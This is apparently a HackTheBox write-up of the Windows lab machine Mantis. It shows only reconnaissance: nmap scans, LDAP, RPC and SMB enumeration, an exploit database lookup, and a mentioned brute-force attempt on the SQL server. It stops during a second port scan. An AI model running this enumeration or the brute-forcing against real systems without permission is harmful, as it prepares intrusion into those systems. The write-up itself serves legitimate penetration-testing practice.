tl;dr

  • Kerberos Exploitation
  • MS MySQL Server
  • MS14-068
  • GoldenTicket

Solved by: 7h3M0nk

If it were me I would have named this box, Rabbit hole. It’s already given as a hard box and it indeed was. There were a lot of services open, and checking each of them to find a vulnerability was nothing less than tedious. At the same time the challenge taught me a ton of new things. There was a time when I had to re-run the port enumeration to find something that I missed out on. While running the exploit I faced difficulties due to a skew time, which was due to my machine not having the same time as the host. There are a lot of things to discuss!!

Initial Analysis

Mantis is a windows box with IP 10.10.10.52. Running port scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79

┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap]
└─$ nmapautomator 10.10.10.25 Basic mantis 

# Nmap 7.91 scan initiated Sun Mar 28 02:57:16 2021 as: nmap -Pn -sCV -p53,88,135,139,389,445,464,636,1433,3268,3269,8080,49153,49154,49155,49157,49158 -oN nmap/Basic_10.10.10.52.nmap 10.10.10.52
Nmap scan report for mantis.htb (10.10.10.52)
Host is up (0.19s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-03-28 07:04:14Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
636/tcp   open  tcpwrapped
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-03-28T06:59:45
|_Not valid after:  2051-03-28T06:59:45
|_ssl-date: 2021-03-28T07:05:25+00:00; +6m51s from scanner time.
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
8080/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 54m51s, deviation: 1h47m22s, median: 6m50s
| ms-sql-info: 
|   10.10.10.52:1433: 
|     Version: 
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2021-03-28T03:05:16-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-03-28T07:05:12
|_  start_date: 2021-03-28T06:59:22

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 28 02:58:40 2021 -- 1 IP address (1 host up) scanned in 83.60 seconds

This is one of the first thing that I got wrong, and only found it out later. I will come to this down the line.

There are a lot of services open, as always adding this to the hosts. The OS discovery was able to find the domain names so I will be adding the same.

1
2
3
4
5
6

┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap]
└─$ cat /etc/hosts | grep 10.10.10.52
10.10.10.52     mantis.htb.local htb.local


There is an http server at port 8080, checking it out.

Web Page

Able to view a blog, there is also a login. I tried to login using default creds, it didn’t work. Tired sql injection, no luck.

Login

Next thing to do is to check for known exploits of the CMS. 

1
2
3
4
5
6
7
8
9
10
11

┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap]
└─$ searchsploit Orchard       
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Orchard 1.3.9 - 'ReturnUrl' Open Redirection                                                                                                              | php/webapps/36493.txt
Orchard CMS 1.7.3/1.8.2/1.9.0 - Persistent Cross-Site Scripting                                                                                           | asp/webapps/37533.txt
Orchard Core RC1 - Persistent Cross-Site Scripting                                                                                                        | aspx/webapps/48456.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

There is nothing good here. I also did a fuzz for directoires and files, nothing came up.

No good. It’s kind of clear that presuing this anymore is a waste of time. Moving on.

LDAP (Lightweight Directory Access Protocol) is a software protocol for enabling anyone to locate organizations, individuals, and other resources such as files and devices in a network, whether on the public Internet or on a corporate intranet. LDAP is a “lightweight” (smaller amount of code) version of Directory Access Protocol (DAP).

I was able to find a pentesting guide on ldap. Trying it out.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

└─$ ipython3                     
Python 3.9.1+ (default, Feb  5 2021, 13:46:56) 
Type 'copyright', 'credits' or 'license' for more information
IPython 7.19.0 -- An enhanced Interactive Python. Type '?' for help.

In [1]: import ldap3

In [2]: server = ldap3.Server('10.10.10.52', get_info = ldap3.ALL, port =636, use_ssl = Tru
   ...: e)

In [3]: connection = ldap3.Connection(server)

In [4]: connection.bind()
---------------------------------------------------------------------------
LDAPSocketOpenError                       Traceback (most recent call last)

if self.closed:  # try to open connection if closed
--> 561                     self.open(read_server_info=False)
    562                 if self.authentication == ANONYMOUS:
    563                     if log_enabled(PROTOCOL):

I tried out all the other ldap-ports 389, 3268, 3269. No luck. Unable to get a True response.

Next in line is msrpc.

Microsoft Remote Procedure Call, also known as a function call or a subroutine call, is a protocol that uses the client-server model in order to allow one program to request service from a program on another computer without having to understand the details of that computer’s network. 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331

┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap]
└─$ rpcdump.py -p 135 mantis.htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Retrieving endpoint list from mantis.htb.local
Protocol: N/A 
Provider: iphlpsvc.dll 
UUID    : 552D076A-CB29-4E44-8B6A-D15E59E2C0AF v1.0 IP Transition Configuration endpoint
Bindings: 
          ncacn_np:\\MANTIS[\PIPE\srvsvc]
          ncacn_ip_tcp:10.10.10.52[49154]
          ncacn_np:\\MANTIS[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLE432023F93EA84007AD401A430B9A]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: schedsvc.dll 
UUID    : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0 
Bindings: 
          ncalrpc:[senssvc]
          ncalrpc:[OLE432023F93EA84007AD401A430B9A]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: nsisvc.dll 
UUID    : 7EA70BCF-48AF-4F6A-8968-6A440754D5FA v1.0 NSI server endpoint
Bindings: 
          ncalrpc:[LRPC-a5b57425227967ebf8]
          ncalrpc:[OLE8770484330BF49878C582390194D]

Protocol: [MS-CMPO]: MSDTC Connection Manager: 
Provider: msdtcprx.dll 
UUID    : 906B0CE0-C70B-1067-B317-00DD010662DA v1.0 
Bindings: 
          ncalrpc:[LRPC-c9f1017a243e4fc361]
          ncalrpc:[OLE3A1B75948E88427FBEC04A0AACEB]
          ncalrpc:[LRPC-ca3d90f5e0f0e452ae]
          ncalrpc:[LRPC-ca3d90f5e0f0e452ae]
          ncalrpc:[LRPC-ca3d90f5e0f0e452ae]
          ncalrpc:[LRPC-ca3d90f5e0f0e452ae]

Protocol: N/A 
Provider: dhcpcsvc6.dll 
UUID    : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint
Bindings: 
          ncalrpc:[dhcpcsvc6]
          ncacn_ip_tcp:10.10.10.52[49153]
          ncacn_np:\\MANTIS[\pipe\eventlog]
          ncalrpc:[eventlog]

Protocol: N/A 
Provider: nrpsrv.dll 
UUID    : 30ADC50C-5CBC-46CE-9A0E-91914789E23C v1.0 NRP server endpoint
Bindings: 
          ncacn_ip_tcp:10.10.10.52[49153]
          ncacn_np:\\MANTIS[\pipe\eventlog]
          ncalrpc:[eventlog]

Protocol: [MS-RSP]: Remote Shutdown Protocol 
Provider: wininit.exe 
UUID    : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.52[49152]
          ncalrpc:[WindowsShutdown]
          ncacn_np:\\MANTIS[\PIPE\InitShutdown]
          ncalrpc:[WMsgKRpc08F040]

Protocol: N/A 
Provider: authui.dll 
UUID    : 24019106-A203-4642-B88D-82DAE9158929 v1.0 
Bindings: 
          ncalrpc:[LRPC-8f45dca7558e3f4634]

Protocol: N/A 
Provider: gpsvc.dll 
UUID    : 2EB08E3E-639F-4FBA-97B1-14F878961076 v1.0 
Bindings: 
          ncalrpc:[OLE432023F93EA84007AD401A430B9A]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: BFE.DLL 
UUID    : DD490425-5325-4565-B774-7E27D6C09C24 v1.0 Base Firewall Engine API
Bindings: 
          ncalrpc:[LRPC-f51225deda4823eab8]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: schedsvc.dll 
UUID    : 86D35949-83C9-4044-B424-DB363231FD0C v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.52[49154]
          ncacn_np:\\MANTIS[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLE432023F93EA84007AD401A430B9A]
          ncalrpc:[IUserProfile2]

Protocol: [MS-DRSR]: Directory Replication Service (DRS) Remote Protocol 
Provider: ntdsai.dll 
UUID    : E3514235-4B06-11D1-AB04-00C04FC2DCD2 v4.0 MS NT Directory DRS Interface
Bindings: 
          ncacn_http:10.10.10.52[49157]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLE9B03129D24C8467E9BEDF87CE46A]
          ncacn_ip_tcp:10.10.10.52[49155]
          ncalrpc:[samss lpc]
          ncalrpc:[dsrole]
          ncacn_np:\\MANTIS[\PIPE\protected_storage]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncalrpc:[LRPC-fc50c2ff87d806d7aa]
          ncacn_np:\\MANTIS[\pipe\lsass]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: taskcomp.dll 
UUID    : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0 
Bindings: 
          ncacn_np:\\MANTIS[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLE432023F93EA84007AD401A430B9A]
          ncalrpc:[IUserProfile2]

Protocol: [MS-DNSP]: Domain Name Service (DNS) Server Management 
Provider: dns.exe 
UUID    : 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 v5.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.52[49168]

Protocol: [MS-PAN]: Print System Asynchronous Notification Protocol 
Provider: spoolsv.exe 
UUID    : 0B6EDBFA-4A24-4FC6-8A23-942B1ECA65D1 v1.0 Spooler function endpoint
Bindings: 
          ncalrpc:[spoolss]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: taskcomp.dll 
UUID    : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0 
Bindings: 
          ncacn_np:\\MANTIS[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLE432023F93EA84007AD401A430B9A]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: spoolsv.exe 
UUID    : 4A452661-8290-4B36-8FBE-7F4093A94978 v1.0 Spooler function endpoint
Bindings: 
          ncalrpc:[spoolss]

Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol 
Provider: samsrv.dll 
UUID    : 12345778-1234-ABCD-EF00-0123456789AC v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.52[49158]
          ncacn_http:10.10.10.52[49157]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLE9B03129D24C8467E9BEDF87CE46A]
          ncacn_ip_tcp:10.10.10.52[49155]
          ncalrpc:[samss lpc]
          ncalrpc:[dsrole]
          ncacn_np:\\MANTIS[\PIPE\protected_storage]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncalrpc:[LRPC-fc50c2ff87d806d7aa]
          ncacn_np:\\MANTIS[\pipe\lsass]

Protocol: [MS-SCMR]: Service Control Manager Remote Protocol 
Provider: services.exe 
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.52[49177]

Protocol: [MS-FRS2]: Distributed File System Replication Protocol 
Provider: dfsrmig.exe 
UUID    : 897E2E5F-93F3-4376-9C9C-FD2277495C27 v1.0 Frs2 Service
Bindings: 
          ncacn_ip_tcp:10.10.10.52[5722]
          ncalrpc:[OLECF530CFB40714FF9A4281B379CD3]

Protocol: N/A 
Provider: IKEEXT.DLL 
UUID    : A398E520-D59A-4BDD-AA7A-3C1E0303A511 v1.0 IKE/Authip API
Bindings: 
          ncacn_np:\\MANTIS[\PIPE\srvsvc]
          ncacn_ip_tcp:10.10.10.52[49154]
          ncacn_np:\\MANTIS[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLE432023F93EA84007AD401A430B9A]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: dhcpcsvc.dll 
UUID    : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5 v1.0 DHCP Client LRPC Endpoint
Bindings: 
          ncalrpc:[dhcpcsvc]
          ncalrpc:[dhcpcsvc6]
          ncacn_ip_tcp:10.10.10.52[49153]
          ncacn_np:\\MANTIS[\pipe\eventlog]
          ncalrpc:[eventlog]

Protocol: [MS-PAN]: Print System Asynchronous Notification Protocol 
Provider: spoolsv.exe 
UUID    : AE33069B-A2A8-46EE-A235-DDFD339BE281 v1.0 Spooler base remote object endpoint
Bindings: 
          ncalrpc:[spoolss]

Protocol: N/A 
Provider: MPSSVC.dll 
UUID    : 2FB92682-6599-42DC-AE13-BD2CA89BD11C v1.0 Fw APIs
Bindings: 
          ncalrpc:[LRPC-f51225deda4823eab8]

Protocol: N/A 
Provider: sysntfy.dll 
UUID    : C9AC6DB5-82B7-4E55-AE8A-E464ED7B4277 v1.0 Impl friendly name
Bindings: 
          ncalrpc:[LRPC-2d71ebdcfc7d9e61d0]
          ncalrpc:[senssvc]
          ncalrpc:[OLE432023F93EA84007AD401A430B9A]
          ncalrpc:[IUserProfile2]
          ncalrpc:[OLE432023F93EA84007AD401A430B9A]
          ncalrpc:[IUserProfile2]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: srvsvc.dll 
UUID    : 98716D03-89AC-44C7-BB8C-285824E51C4A v1.0 XactSrv service
Bindings: 
          ncacn_ip_tcp:10.10.10.52[49154]
          ncacn_np:\\MANTIS[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLE432023F93EA84007AD401A430B9A]
          ncalrpc:[IUserProfile2]

Protocol: [MS-EVEN6]: EventLog Remoting Protocol 
Provider: wevtsvc.dll 
UUID    : F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C v1.0 Event log TCPIP
Bindings: 
          ncacn_ip_tcp:10.10.10.52[49153]
          ncacn_np:\\MANTIS[\pipe\eventlog]
          ncalrpc:[eventlog]

Protocol: N/A 
Provider: N/A 
UUID    : 3473DD4D-2E88-4006-9CBA-22570909DD10 v5.1 WinHttp Auto-Proxy Service
Bindings: 
          ncacn_np:\\MANTIS[\PIPE\W32TIME_ALT]
          ncalrpc:[W32TIME_ALT]
          ncalrpc:[LRPC-a5b57425227967ebf8]
          ncalrpc:[OLE8770484330BF49878C582390194D]

Protocol: N/A 
Provider: winlogon.exe 
UUID    : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0 
Bindings: 
          ncalrpc:[WindowsShutdown]
          ncacn_np:\\MANTIS[\PIPE\InitShutdown]
          ncalrpc:[WMsgKRpc08F040]
          ncalrpc:[WMsgKRpc092261]

Protocol: [MS-FASP]: Firewall and Advanced Security Protocol 
Provider: FwRemoteSvr.dll 
UUID    : 6B5BDD1E-528C-422C-AF8C-A4079BE4FE48 v1.0 Remote Fw APIs
Bindings: 
          ncacn_ip_tcp:10.10.10.52[49182]

Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 IPSec Policy agent endpoint
Bindings: 
          ncalrpc:[LRPC-5e7fe9d91bf9f59610]
          ncacn_ip_tcp:10.10.10.52[49182]

Protocol: [MS-LSAT]: Local Security Authority (Translation Methods) Remote 
Provider: lsasrv.dll 
UUID    : 12345778-1234-ABCD-EF00-0123456789AB v0.0 
Bindings: 
          ncacn_http:10.10.10.52[49157]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLE9B03129D24C8467E9BEDF87CE46A]
          ncacn_ip_tcp:10.10.10.52[49155]
          ncalrpc:[samss lpc]
          ncalrpc:[dsrole]
          ncacn_np:\\MANTIS[\PIPE\protected_storage]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncalrpc:[LRPC-fc50c2ff87d806d7aa]
          ncacn_np:\\MANTIS[\pipe\lsass]

Protocol: [MS-NRPC]: Netlogon Remote Protocol 
Provider: netlogon.dll 
UUID    : 12345678-1234-ABCD-EF00-01234567CFFB v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.52[49158]
          ncacn_http:10.10.10.52[49157]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLE9B03129D24C8467E9BEDF87CE46A]
          ncacn_ip_tcp:10.10.10.52[49155]
          ncalrpc:[samss lpc]
          ncalrpc:[dsrole]
          ncacn_np:\\MANTIS[\PIPE\protected_storage]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncalrpc:[LRPC-fc50c2ff87d806d7aa]
          ncacn_np:\\MANTIS[\pipe\lsass]

Protocol: N/A 
Provider: MPSSVC.dll 
UUID    : 7F9D11BF-7FB9-436B-A812-B2D50C5D4C03 v1.0 Fw APIs
Bindings: 
          ncalrpc:[LRPC-f51225deda4823eab8]

[*] Received 153 endpoints.

I thought this was the foothold, but was unable to get any useful info due to the lack of privilages.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

                                                                                           
┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap]
└─$ rpcclient -U '' -N mantis.htb.local                                              130 ⨯
rpcclient $> querydominfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumprivs
found 34 privileges

SeCreateTokenPrivilege          0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege           0:3 (0x0:0x3)
SeLockMemoryPrivilege           0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege                0:5 (0x0:0x5)
SeMachineAccountPrivilege               0:6 (0x0:0x6)
SeTcbPrivilege          0:7 (0x0:0x7)
SeSecurityPrivilege             0:8 (0x0:0x8)
SeTakeOwnershipPrivilege                0:9 (0x0:0x9)
SeLoadDriverPrivilege           0:10 (0x0:0xa)
SeSystemProfilePrivilege                0:11 (0x0:0xb)
SeSystemtimePrivilege           0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege                 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege                 0:14 (0x0:0xe)
SeCreatePagefilePrivilege               0:15 (0x0:0xf)
SeCreatePermanentPrivilege              0:16 (0x0:0x10)
SeBackupPrivilege               0:17 (0x0:0x11)
SeRestorePrivilege              0:18 (0x0:0x12)
SeShutdownPrivilege             0:19 (0x0:0x13)
SeDebugPrivilege                0:20 (0x0:0x14)
SeAuditPrivilege                0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege            0:22 (0x0:0x16)
SeChangeNotifyPrivilege                 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege               0:24 (0x0:0x18)
SeUndockPrivilege               0:25 (0x0:0x19)
SeSyncAgentPrivilege            0:26 (0x0:0x1a)
SeEnableDelegationPrivilege             0:27 (0x0:0x1b)
SeManageVolumePrivilege                 0:28 (0x0:0x1c)
SeImpersonatePrivilege          0:29 (0x0:0x1d)
SeCreateGlobalPrivilege                 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege                 0:31 (0x0:0x1f)
SeRelabelPrivilege              0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege           0:33 (0x0:0x21)
SeTimeZonePrivilege             0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege           0:35 (0x0:0x23)
rpcclient $> netshareenumall
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $>

This is going to take some time. What is next? smb, don’t think it’s going to work but still.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap]
└─$ smbmap -H 10.10.10.52                                                              1 ⨯
/usr/lib/python3/dist-packages/impacket/smbserver.py:2464: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if jtr_dump_path is not '':
/usr/lib/python3/dist-packages/impacket/smbserver.py:2500: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if jtr_dump_path is not '':
/usr/lib/python3/dist-packages/impacket/smbserver.py:2842: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if jtr_dump_path is not '':
/usr/lib/python3/dist-packages/impacket/smbserver.py:4416: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if credentials_fname is not "":
[+] IP: 10.10.10.52:445 Name: mantis.htb.local                                  
                                                                                           
┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap]
└─$ sudo nbtscan -r 10.10.10.52/24
[sudo] password for kali: 
Doing NBT name scan for addresses from 10.10.10.52/24

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
                                                                                           
┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap]
└─$ smbclient -no-pass -L //10.10.10.52
Enter WORKGROUP\kali's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap]
└─$ smbclient -U '%' -N \\\\10.10.10.52\\NETLOGON
tree connect failed: NT_STATUS_ACCESS_DENIED

Running out of stuff to check. MySQL? That was a funny story, I tried brute forcing into the msql server using medusa.

BruteForce

That didn’t work.

Kerberos, this is my first time pentesting kerberos. Found this article, no use since I don’t have the username and password. -_-

At this point it’s pretty clear that I missed something. The best way forward is to do another enumeration.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107

┌──(kali㉿kali)-[~/HackTheBox/mantis/nmap/nmap]
└─$ cat Full_10.10.10.52.nmap 
# Nmap 7.91 scan initiated Mon Mar 29 01:26:29 2021 as: nmap -Pn -sCV -p53,88,135,139,389,445,464,593,636,1337,1433,3268,3269,5722,8080,9389,47001,49152,49153,49154,49155,49157,49158,49164,49166,49168,50255 -oN nmap/Full_10.10.10.52.nmap 10.10.10.52
Nmap scan report for mantis.htb (10.10.10.52)
Host is up (0.19s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-03-29 05:33:29Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1337/tcp  open  http         Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-03-28T06:59:45
|_Not valid after:  2051-03-28T06:59:45
|_ssl-date: 2021-03-29T05:34:40+00:00; +6m52s from scanner time.
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc        Microsoft Windows RPC
8080/tcp  open  http         Microsoft IIS httpd 7.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
49164/tcp open  msrpc        Microsoft Windows RPC
49166/tcp open  msrpc        Microsoft Windows RPC
49168/tcp open  msrpc        Microsoft Windows RPC
50255/tcp open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
